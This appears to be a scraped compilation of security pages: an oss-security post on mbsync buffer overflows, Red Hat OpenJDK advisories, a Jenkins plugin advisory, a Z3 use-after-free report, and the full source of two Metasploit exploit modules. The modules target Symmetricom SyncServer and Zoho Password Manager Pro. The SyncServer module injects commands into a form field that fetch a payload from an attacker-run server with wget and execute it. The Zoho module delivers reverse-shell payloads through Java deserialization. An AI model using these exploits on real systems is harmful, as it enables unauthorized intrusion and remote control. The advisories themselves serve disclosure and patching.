A flaw was found in mbsync versions prior to 1.4.4. Due to inadequate handling of extremely large (>=2GiB) IMAP literals, malicious or compromised IMAP servers, and hypothetically even external email senders, could cause several different buffer overflows, which could conceivably be exploited for remote code execution.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 3 Dec 2021 12:24:32 +0100
From: Oswald Buddenhagen <oswald.buddenhagen@....de>
To: isync-devel@...ts.sourceforge.net
Cc: oss-security@...ts.openwall.com
Subject: CVE-2021-3657: multiple buffer overflows in isync/mbsync

description:

A flaw was found in mbsync versions prior to 1.4.4. Due to inadequate
handling of extremely large (>=2GiB) IMAP literals, malicious or
compromised IMAP servers, and hypothetically even external email
senders, could cause several different buffer overflows, which could
conceivably be exploited for remote code execution.

mitigation:

upgrade to the freshly released v1.4.4 available from 
https://sourceforge.net/projects/isync/files/isync/ , or apply the 
matching attached patch. note that while a patch for v1.3.x is provided, 
no upstream release will be made any more.

details:

i'm not sure it's actually possible to pull off RCE with these. a
non-server attacker would be additionally impaired by message size
limitations and being unable to predict the exact size of the headers
stored in the box, so they would likely need an account on the same
liberally configured system, apart from knowing to target mbsync.

**View attachment "**CVE-2021-3657-buffer-overflows-on-big-1.4.patch**" of type "**text/x-diff**" (7190 bytes)**

**View attachment "**CVE-2021-3657-buffer-overflows-on-big-1.3.patch**" of type "**text/x-diff**" (5489 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2021-3657: security - CVE-2021-3657: multiple buffer overflows in isync/mbsync

This Metasploit module exploits an unauthenticated command injection vulnerability in /controller/ping.php in Symmetricom SyncServer. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer::HTML  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.          The S100 through S350 (End of Life) models should be vulnerable to          unauthenticated exploitation due to a session handling vulnerability.          Later models require authentication which is not provided in this module because we can't test it.          The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).          Run 'check' first to determine if vulnerable.          The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT          and LPORT while testing this module.        },        'Author' => [          'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module          'Justin Fatuch Apt4hax', # Exploit PoC          'Robert Bronstein' # Metasploit Module        ],        'References' => [          ['CVE', '2022-40022'],          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']        ],        'DisclosureDate' => '2022-08-31',        'License' => MSF_LICENSE,        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),        OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),        OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])      ], self.class    )  end  def primer; end  def on_request_uri(cli, req)    @pl = generate_payload_exe    print_status("#{peer} - Payload request received: #{req.uri}")    send_response(cli, @pl)  end  def check    uri = '/controller/ping.php'    res = send_request_cgi({      'method' => 'POST',      'uri' => uri,      'vars_post' =>          {            'currentTab' => 'ping',            'refreshMode' => 'dirty',            'ethDirty' => 'false',            'snmpCfgDirty' => 'false',            'snmpTrapDirty' => 'false',            'pingDirty' => 'true',            'hostname' => "\`id\`",            'port' => 'eth0',            'pingType' => 'ping'          }    })    if res && res.body.to_s =~ /uid=0/      Exploit::CheckCode::Vulnerable    else      Exploit::CheckCode::Safe    end  end  def request(cmd)    uri = '/controller/ping.php'    send_request_cgi({      'method' => 'POST',      'Content-Type' => 'application/x-www-form-encoded',      'uri' => uri,      'vars_post' =>      {        'currentTab' => 'ping',        'refreshMode' => 'dirty',        'ethDirty' => 'false',        'snmpCfgDirty' => 'false',        'snmpTrapDirty' => 'false',        'pingDirty' => 'true',        'hostname' => cmd,        'port' => 'eth0',        'pingType' => 'ping'      }    })  end  def exploit    srvhost = datastore['SRVHOST']    srvport = datastore['SRVPORT']    filename = datastore['FILENAME']    resource_uri = '/' + filename    shell_path = '/tmp/'    cmds = [      "\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",      "\`chmod${IFS}700${IFS}" + shell_path + filename + "\`",      "\`" + shell_path + filename + "\`"    ]    start_service({      'Uri' => {        'Proc' => proc { |cli, req|                    on_request_uri(cli, req)                  },        'Path' => resource_uri      }    })    print_status("#{rhost}:#{rport} - Exploit started...")    print_status("#{rhost}:#{rport} - Sending wget command...")    request(cmds[0])    sleep(3)    print_status("#{rhost}:#{rport} - Making payload executable...")    request(cmds[1])    sleep(3)    print_status("#{rhost}:#{rport} - Executing payload...")    request(cmds[2])    sleep(3)  endend

Symmetricom SyncServer Unauthenticated Remote Command Execution

This Metasploit module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain remote command execution as the SYSTEM user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::JavaDeserialization  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization',        'Description' => %q{          This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro          before 12101 and PAM360 before 5510. Unauthenticated attackers can send a          crafted XML-RPC request containing malicious serialized data to /xmlrpc to          gain RCE as the SYSTEM user.        },        'Author' => [          'Vinicius', # Discovery          'Y4er', # Writeup          'Grant Willcox' # Exploit        ],        'References' => [          ['CVE', '2022-35405'],          ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup          ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory          ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch.        ],        'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date.        'License' => MSF_LICENSE,        'Platform' => ['win'],        'Arch' => [ARCH_CMD, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Windows EXE Dropper',            {              'Arch' => ARCH_X64,              'Type' => :windows_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :windows_command,              'Space' => 3000,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }            }          ],          [            'Windows Powershell',            {              'Arch' => ARCH_X64,              'Type' => :windows_powershell,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' }            }          ]        ],        'DefaultTarget' => 1,        'DefaultOptions' => {          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      Opt::RPORT(7272),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    # Send an empty serialized object    res = send_request_xmlrpc('')    unless res      return CheckCode::Unknown('Target did not respond to check.')    end    if res.body.include?('Failed to read result object: null')      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')    end    CheckCode::Safe('Target cannot deserialize arbitrary data.')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :windows_command      execute_command(payload.encoded)    when :windows_dropper      cmd_target = targets.select { |target| target['Type'] == :windows_command }.first      execute_cmdstager({ linemax: cmd_target.opts['Space'] })    when :windows_powershell      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))    end  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    res = send_request_xmlrpc(      generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)    )    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")    end    print_good("Successfully executed command: #{cmd}")  end  def send_request_xmlrpc(data)    # http://xmlrpc.com/    # https://ws.apache.org/xmlrpc/    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/xmlrpc'),      'ctype' => 'text/xml',      'data' => <<~XML        <?xml version="1.0"?>        <methodCall>          <methodName>#{rand_text_alphanumeric(8..42)}</methodName>          <params>            <param>              <value>                <struct>                  <member>                    <name>#{rand_text_alphanumeric(8..42)}</name>                    <value>                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable>                    </value>                  </member>                </struct>              </value>            </param>          </params>        </methodCall>      XML    )  endend

Zoho Password Manager Pro XML-RPC Java Deserialization

Red Hat Security Advisory 2024-0250-03 - An update is now available for OpenJDK. Issues addressed include code execution and out of bounds access vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0250.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenJDK 21.0.2 security update  
Advisory ID:        RHSA-2024:0250-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0250  
Issue date:         2024-01-17  
Revision:           03  
CVE Names:          CVE-2024-20918  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 21 (21.0.2) for Windows serves as a replacement for the Red Hat build of OpenJDK 21 (21.0.1) and includes security and bug fixes. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)

* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)

* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)

* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)

* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-20918

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2257728  
https://bugzilla.redhat.com/show_bug.cgi?id=2257837  
https://bugzilla.redhat.com/show_bug.cgi?id=2257853  
https://bugzilla.redhat.com/show_bug.cgi?id=2257859  
https://bugzilla.redhat.com/show_bug.cgi?id=2257874

Red Hat Security Advisory 2024-0250-03

Red Hat Security Advisory 2024-0247-03 - An update is now available for OpenJDK. Issues addressed include code execution and out of bounds access vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0247.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenJDK 21.0.2 security update  
Advisory ID:        RHSA-2024:0247-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0247  
Issue date:         2024-01-17  
Revision:           03  
CVE Names:          CVE-2024-20918  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 21 (21.0.2) for portable Linux serves as a replacement for the Red Hat build of OpenJDK 21 (21.0.1) and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)

* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)

* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)

* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)

* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-20918

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2257728  
https://bugzilla.redhat.com/show_bug.cgi?id=2257837  
https://bugzilla.redhat.com/show_bug.cgi?id=2257853  
https://bugzilla.redhat.com/show_bug.cgi?id=2257859  
https://bugzilla.redhat.com/show_bug.cgi?id=2257874

Red Hat Security Advisory 2024-0247-03

Jenkins Crap4J Plugin 0.9 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   AbsInt a³ Plugin
*   Convert To Pipeline Plugin
*   Cppcheck Plugin
*   Crap4J Plugin
*   JaCoCo Plugin
*   Mashup Portlets Plugin
*   OctoPerf Load Testing Plugin Plugin
*   OctoPerf Load Testing Plugin Plugin
*   OctoPerf Load Testing Plugin Plugin
*   Performance Publisher Plugin
*   Phabricator Differential Plugin
*   Pipeline Aggregator View Plugin
*   remote-jobs-view-plugin Plugin
*   Role-based Authorization Strategy Plugin
*   Visual Studio Code Metrics Plugin

**Descriptions****Incorrect permission checks in Role-based Authorization Strategy Plugin**

**SECURITY-3053 / CVE-2023-28668**  
**Severity (CVSS):** Medium  
**Affected plugin: role-strategy**  
**Description:**

Permissions in Jenkins can be enabled and disabled. Some permissions are disabled by default, e.g., Overall/Manage or Item/Extended Read. Disabled permissions cannot be granted directly, only through greater permissions that imply them (e.g., Overall/Administer or Item/Configure).

Role-based Authorization Strategy Plugin 587.v2872c41fa\_e51 and earlier grants permissions even after they’ve been disabled.

This allows attackers to have greater access than they’re entitled to after the following operations took place:

1.  A permission is granted to attackers directly or through groups.
    
2.  The permission is disabled, e.g., through the script console.
    

Role-based Authorization Strategy Plugin 587.588.v850a\_20a\_30162 does not grant disabled permissions.

**Stored XSS vulnerability in JaCoCo Plugin**

**SECURITY-3061 / CVE-2023-28669**  
**Severity (CVSS):** High  
**Affected plugin: jacoco**  
**Description:**

JaCoCo Plugin 3.3.2 and earlier does not escape class and method names shown on the UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control input files for the 'Record JaCoCo coverage report' post-build action.

JaCoCo Plugin 3.3.2.1 escapes class and method names shown on the UI.

**Stored XSS vulnerability in Pipeline Aggregator View Plugin**

**SECURITY-2885 / CVE-2023-28670**  
**Severity (CVSS):** High  
**Affected plugin: pipeline-aggregator-view**  
**Description:**

Pipeline Aggregator View Plugin 1.13 and earlier does not escape a variable representing the current view’s URL in inline JavaScript.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

Pipeline Aggregator View Plugin 1.14 obtains the current URL in a way not susceptible to XSS.

**CSRF vulnerability in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (1) / CVE-2023-28671**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.0 and earlier does not require POST requests for a connection test HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

OctoPerf Load Testing Plugin Plugin 4.5.1 requires POST requests for the affected connection test HTTP endpoint.

**Missing permission check in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (2) / CVE-2023-28672**  
**Severity (CVSS):** High  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.1 and earlier does not perform a permission check in a connection test HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

OctoPerf Load Testing Plugin Plugin 4.5.2 properly performs a permission check when accessing the affected connection test HTTP endpoint.

**Missing permission check in OctoPerf Load Testing Plugin Plugin allows enumerating credentials IDs**

**SECURITY-3067 (3) / CVE-2023-28673**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in OctoPerf Load Testing Plugin Plugin 4.5.3 requires the appropriate permissions.

**CSRF vulnerability and missing permission checks in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (4) / CVE-2023-28674 (CSRF), CVE-2023-28675 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to a previously configured Octoperf server using attacker-specified credentials.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

OctoPerf Load Testing Plugin Plugin 4.5.3 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**CSRF vulnerability in Convert To Pipeline Plugin results in RCE**

**SECURITY-2963 / CVE-2023-28676**  
**Severity (CVSS):** High  
**Affected plugin: convert-to-pipeline**  
**Description:**

Convert To Pipeline Plugin 1.0 and earlier does not require POST requests for the HTTP endpoint converting a Freestyle project to Pipeline, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to create a Pipeline based on a Freestyle project. Combined with SECURITY-2966, this can result in the execution of unsandboxed Pipeline scripts.

**Command injection vulnerability in Convert To Pipeline Plugin results in RCE**

**SECURITY-2966 / CVE-2023-28677**  
**Severity (CVSS):** High  
**Affected plugin: convert-to-pipeline**  
**Description:**

Convert To Pipeline Plugin 1.0 and earlier uses basic string concatenation to convert Freestyle projects' Build Environment, Build Steps, and Post-build Actions to the equivalent Pipeline step invocations.

This allows attackers able to configure Freestyle projects to prepare a crafted configuration that injects Pipeline script code into the (unsandboxed) Pipeline resulting from a conversion by Convert To Pipeline Plugin. If an administrator converts the Freestyle project to a Pipeline, the script will be pre-approved.

**Stored XSS vulnerability in Cppcheck Plugin**

**SECURITY-2809 / CVE-2023-28678**  
**Severity (CVSS):** High  
**Affected plugin: cppcheck**  
**Description:**

Cppcheck Plugin 1.26 and earlier does not escape file names from Cppcheck report files before showing them on the Jenkins UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control report file contents.

**Stored XSS vulnerability in Mashup Portlets Plugin**

**SECURITY-2813 / CVE-2023-28679**  
**Severity (CVSS):** High  
**Affected plugin: mashup-portlets-plugin**  
**Description:**

Mashup Portlets Plugin 1.1.2 and earlier provides the "Generic JS Portlet" feature that lets a user populate a portlet using a custom JavaScript expression.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

**XXE vulnerability in Crap4J Plugin**

**SECURITY-2925 / CVE-2023-28680**  
**Severity (CVSS):** High  
**Affected plugin: crap4j**  
**Description:**

Crap4J Plugin 0.9 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control Crap Report file contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Visual Studio Code Metrics Plugin**

**SECURITY-2926 / CVE-2023-28681**  
**Severity (CVSS):** High  
**Affected plugin: vs-code-metrics**  
**Description:**

Visual Studio Code Metrics Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control VS Code Metrics File contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Performance Publisher Plugin**

**SECURITY-2928 / CVE-2023-28682**  
**Severity (CVSS):** High  
**Affected plugin: perfpublisher**  
**Description:**

Performance Publisher Plugin 8.09 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control PerfPublisher report files to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Phabricator Differential Plugin**

**SECURITY-2942 / CVE-2023-28683**  
**Severity (CVSS):** High  
**Affected plugin: phabricator-plugin**  
**Description:**

Phabricator Differential Plugin 2.1.5 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control coverage report file contents for the 'Post to Phabricator' post-build action to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in remote-jobs-view-plugin Plugin**

**SECURITY-2956 / CVE-2023-28684**  
**Severity (CVSS):** High  
**Affected plugin: remote-jobs-view-plugin**  
**Description:**

remote-jobs-view-plugin Plugin 0.0.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows authenticated attackers with Overall/Read permission to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in AbsInt a³ Plugin**

**SECURITY-2930 / CVE-2023-28685**  
**Severity (CVSS):** High  
**Affected plugin: absint-a3**  
**Description:**

AbsInt a³ Plugin 1.1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control 'Project File (APX)' contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**Severity**

*   SECURITY-2809: High
*   SECURITY-2813: High
*   SECURITY-2885: High
*   SECURITY-2925: High
*   SECURITY-2926: High
*   SECURITY-2928: High
*   SECURITY-2930: High
*   SECURITY-2942: High
*   SECURITY-2956: High
*   SECURITY-2963: High
*   SECURITY-2966: High
*   SECURITY-3053: Medium
*   SECURITY-3061: High
*   SECURITY-3067 (1): Medium
*   SECURITY-3067 (2): High
*   SECURITY-3067 (3): Medium
*   SECURITY-3067 (4): Medium

**Affected Versions**

*   **AbsInt a³ Plugin** up to and including 1.1.0
*   **Convert To Pipeline Plugin** up to and including 1.0
*   **Cppcheck Plugin** up to and including 1.26
*   **Crap4J Plugin** up to and including 0.9
*   **JaCoCo Plugin** up to and including 3.3.2
*   **Mashup Portlets Plugin** up to and including 1.1.2
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.0
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.1
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.2
*   **Performance Publisher Plugin** up to and including 8.09
*   **Phabricator Differential Plugin** up to and including 2.1.5
*   **Pipeline Aggregator View Plugin** up to and including 1.13
*   **remote-jobs-view-plugin Plugin** up to and including 0.0.3
*   **Role-based Authorization Strategy Plugin** up to and including 587.v2872c41fa\_e51
*   **Visual Studio Code Metrics Plugin** up to and including 1.7

**Fix**

*   **JaCoCo Plugin** should be updated to version 3.3.2.1
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.1
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.2
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.3
*   **Pipeline Aggregator View Plugin** should be updated to version 1.14
*   **Role-based Authorization Strategy Plugin** should be updated to version 587.588.v850a\_20a\_30162

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   AbsInt a³ Plugin
*   Convert To Pipeline Plugin
*   Cppcheck Plugin
*   Crap4J Plugin
*   Mashup Portlets Plugin
*   Performance Publisher Plugin
*   Phabricator Differential Plugin
*   remote-jobs-view-plugin Plugin
*   Visual Studio Code Metrics Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **CC Bomber, Kitri BoB** for SECURITY-2925, SECURITY-2926, SECURITY-2928, SECURITY-2930, SECURITY-2942, SECURITY-2963
*   **Daniel Beck, CloudBees, Inc. and Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2809
*   **Daniel Beck, CloudBees, Inc. and Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3053
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2885, SECURITY-3061
*   **LaNyer640 & Crilwa** for SECURITY-2956
*   **Valdes Che Zogou, CloudBees, Inc.** for SECURITY-2813
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-2966, SECURITY-3067 (1), SECURITY-3067 (2), SECURITY-3067 (3), SECURITY-3067 (4)

CVE-2023-28680: Jenkins Security Advisory 2023-03-21

Jenkins Role-based Authorization Strategy Plugin 587.v2872c41fa_e51 and earlier grants permissions even after they've been disabled.

CVE-2023-28668: Jenkins Security Advisory 2023-03-21

There is a use-after-free vulnerability in file pdd_simplifier.cpp in Z3 before 4.8.8. It occurs when the solver attempt to simplify the constraints and causes unexpected memory access. It can cause segmentation faults or arbitrary code execution.

Hi, there.

There is a use after free issue that causes segmentation fault using z3.

To reproduce this issue, simply run  
z3 poc.smt2  
z3-uaf\_pdd\_simplified.smt2.zip

OS: Ubuntu 16.06  
commit 6ad261e

Here is the trace reported by ASAN.

    ==42916==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000057aa8 at pc 0x000002126476 bp 0x7ffce1825cf0 sp 0x7ffce1825ce0
    READ of size 8 at 0x603000057aa8 thread T0
        #0 0x2126475 in dd::simplifier::simplify_linear_step(old_ptr_vector<dd::solver::equation>&) ../src/math/grobner/pdd_simplifier.cpp:131
        #1 0x2125e9c in dd::simplifier::simplify_linear_step(bool) ../src/math/grobner/pdd_simplifier.cpp:103
        #2 0x2125862 in dd::simplifier::operator()() ../src/math/grobner/pdd_simplifier.cpp:69
        #3 0x211ffda in dd::solver::simplify() ../src/math/grobner/pdd_solver.cpp:135
        #4 0x211f6af in dd::solver::saturate() ../src/math/grobner/pdd_solver.cpp:93
        #5 0x1e14c8b in nla::core::run_grobner() ../src/math/lp/nla_core.cpp:1403
        #6 0x1e136dd in nla::core::inner_check(bool) ../src/math/lp/nla_core.cpp:1288
        #7 0x1e13ed2 in nla::core::check(old_vector<nla::lemma, true, unsigned int>&) ../src/math/lp/nla_core.cpp:1341
        #8 0x1d4dbbd in nla::solver::check(old_vector<nla::lemma, true, unsigned int>&) ../src/math/lp/nla_solver.cpp:40
        #9 0xdc9029 in smt::theory_lra::imp::check_nra() (/home/heqing/dependence/z3/build/z3+0xdc9029)
        #10 0xdc1d03 in smt::theory_lra::imp::final_check_eh() ../src/smt/theory_lra.cpp:1753
        #11 0xda83e4 in smt::theory_lra::final_check_eh() ../src/smt/theory_lra.cpp:3976
        #12 0x11bac65 in smt::context::final_check() ../src/smt/smt_context.cpp:3904
        #13 0x11b9c6e in smt::context::bounded_search() ../src/smt/smt_context.cpp:3819
        #14 0x11b73a9 in smt::context::search() ../src/smt/smt_context.cpp:3646
        #15 0x11b4da4 in smt::context::setup_and_check(bool) ../src/smt/smt_context.cpp:3471
